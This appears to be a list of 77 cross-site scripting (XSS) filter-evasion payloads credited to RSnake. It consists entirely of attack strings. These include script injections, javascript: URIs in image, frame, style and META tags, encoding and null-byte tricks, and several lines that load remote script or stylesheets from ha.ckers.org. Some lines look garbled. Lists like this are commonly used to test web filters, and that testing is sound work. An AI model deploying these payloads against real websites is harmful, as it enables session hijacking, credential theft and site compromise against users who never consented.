1
|
# credit to rsnake
|
2
|
<SCRIPT>alert('XSS');</SCRIPT>
|
3
|
'';!--"<XSS>=&{()}
|
4
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
5
|
<IMG SRC="javascript:alert('XSS');">
|
6
|
<IMG SRC=javascript:alert('XSS')>
|
7
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
8
|
<IMG SRC=javascript:alert("XSS")>
|
9
|
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
10
|
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
11
|
SRC=
<IMG 6;avascript:alert('XSS')>
|
12
|
<IMG SRC=javascript:alert('XSS')>
|
13
|
<IMG SRC=javascript:alert('XSS')>
|
14
|
<IMG SRC="jav ascript:alert('XSS');">
|
15
|
<IMG SRC="jav	ascript:alert('XSS');">
|
16
|
<IMG SRC="jav
ascript:alert('XSS');">
|
17
|
<IMG SRC="jav
ascript:alert('XSS');">
|
18
|
<IMG SRC="  javascript:alert('XSS');">
|
19
|
<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a>
|
20
|
<IMG SRC=java%00script:alert(\"XSS\")>
|
21
|
<SCR%00IPT>alert(\"XSS\")</SCR%00IPT>
|
22
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
23
|
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
|
24
|
<IMG SRC="javascript:alert('XSS')"
|
25
|
<SCRIPT>a=/XSS/
|
26
|
\";alert('XSS');//
|
27
|
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
28
|
<BODY BACKGROUND="javascript:alert('XSS')">
|
29
|
<BODY ONLOAD=alert('XSS')>
|
30
|
<IMG DYNSRC="javascript:alert('XSS')">
|
31
|
<IMG LOWSRC="javascript:alert('XSS')">
|
32
|
<BGSOUND SRC="javascript:alert('XSS');">
|
33
|
<BR SIZE="&{alert('XSS')}">
|
34
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
35
|
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
36
|
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
37
|
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
38
|
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
39
|
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
40
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
41
|
<IMG SRC="mocha:[code]">
|
42
|
<IMG SRC="livescript:[code]">
|
43
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
44
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
45
|
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
|
46
|
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
47
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
48
|
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
49
|
<TABLE BACKGROUND="javascript:alert('XSS')">
|
50
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
51
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
52
|
<DIV STYLE="width: expression(alert('XSS'));">
|
53
|
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
54
|
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
55
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
56
|
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
57
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
58
|
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
59
|
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
60
|
<BASE HREF="javascript:alert('XSS');//">
|
61
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
62
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
63
|
getURL("javascript:alert('XSS')")
|
64
|
a="get";
|
65
|
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
|
66
|
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
67
|
<HTML><BODY>
|
68
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
69
|
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
70
|
<? echo('<SCR)';
|
71
|
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
72
|
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
73
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
74
|
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
75
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
76
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
77
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|